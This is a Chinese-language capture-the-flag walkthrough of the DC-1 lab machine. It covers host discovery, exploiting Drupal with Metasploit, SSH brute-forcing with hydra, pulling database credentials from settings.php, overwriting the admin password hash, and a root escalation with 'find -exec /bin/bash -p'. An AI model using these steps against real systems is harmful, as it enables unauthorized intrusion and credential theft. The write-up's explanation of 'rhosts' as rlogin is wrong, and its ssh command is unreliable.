因为DC-1的账号和密码还不知道,所以不能查看DC-1的IP地址,那么我们将通过kali来扫描到DC-1的IP地址。
1.查看mac地址
通过查看mac地址来确定靶机的ip
arp-scan -l :查看当前局域网的所有设备
靶机的mac地址
通过对比,找到ip地址:10.9.136.84
登陆网页
2.扫描Ip
nmap -A 10.9.136.84
找到两个开放端口
3.继续扫描漏洞
(1)使用工具扫描
使用wappalyser查找到cms漏洞,使用方法查看下方链接
(2)使用msf攻击漏洞
启动msf的数据库
msfdb start
启动msfconsole
搜索 search Drupal
使用第二个漏洞: use 2
使用show missing查看一下必须要设置的选项
rhosts含义:远程登录(rlogin)是一个 UNIX 命令,它允许授权用户进入网络中的其它 UNIX 机器并且就像用户在现场操作一样。一旦进入主机,用户可以操作主机允许的任何事情,比如:读文件、编辑文件或删除文件等。
需要设置rhosts,rhosts就是设置靶机的IP地址
使用set设置
set rhosts 10.9.136.84
使用show options 可以查看设置好的信息
确定设置的信息没问题
输入run开始执行攻击,成功
查看里面的信息:ls
flag1
ls可以看到第一个flag1.txt
第一个falg找到,查看:cat flag1.txt
查看一下靶机的用户,发现有个flag4的用户
cat /etc/passwd
找到flag4
使用hydra来爆破一波看看是否能拿到密码
hydra -l flag4 -P /usr/share/john/password.lst 10.9.136.84 ssh
可以得到flag4的密码为orange
使用ssh连接靶机
ssh flag@10.9.136.84
ls在flag4账户的目录下找到了falg4,可想而知还有在前面还有两个flag,可能在web上,因为web有账号
既然已经登录进靶机了,那么我们就去查看一下web的配置文件
进度入到var/www的目录下
在百度上可以找到drupal的配置文件是/var/www/sites/default/settings.php
使用命令查看一下
cat sites/default/settings.php
在配置文件中看到了flag2还有数据库的信息
'username' => 'dbuser',
'password' => 'R0ck3t',
使用命令连接数据库
mysql -u dbuser -p
连接成功
查看数据库:show databases;
使用数据表use drupaldb
查看表:show tables;
使用命令查看一下
select * from users;
可以看到管理员的账户,但是先要搞hash值,有点难
quit退出数据库连接
搜索一下passwd
find / -name password*
可以看到var/www/scripts下有个sh的脚本
直接执行试试
可以设置密码,尝试一下后面加上密码
scripts/password-hash.sh 123456
得到一个哈希值,那么我们可以将这个哈希值替换到数据库admin得账号下
修改数据库中admin的哈希值
update users set pass='$S$DvaDIRP8Hxz93/2ZLLeQrczm5gK1BR6KrJX2JmOGPB7boVeFE3wa' where name='admin';
修改成功尝试去web界面登录试试
找到了flag3
找到flag3后,继续对falg4提权
提权
find -name flag4.txt -exec /bin/bash -p \;
进入root权限,查看内容
cat thefinalflag.txt